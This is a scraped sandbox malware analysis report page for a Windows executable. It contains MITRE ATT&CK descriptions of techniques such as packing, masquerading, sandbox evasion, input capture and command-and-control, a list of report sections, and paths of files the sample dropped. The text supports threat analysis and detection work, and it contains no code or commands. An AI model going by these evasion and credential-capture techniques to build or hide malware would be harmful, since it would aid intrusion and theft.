Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Lisect_AVT_24003_G1A_37.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\MPGPH131\MPGPH131.exe

C:\ProgramData\MPGPH131\MPGPH131.exe:Zone.Identifier

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MlpxPf.exe_44251beb80dd5e7d95c3aacd014eb4bd9dd3755_509ea325_9e635127-f99b-40a5-a75b-dba6d17ffe59\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER432A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4493.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER44C3.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k1[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k1[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k2[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k2[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\k3[1].rar

Windows Analysis Report
Lisect_AVT_24003_G1A_37.exe

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre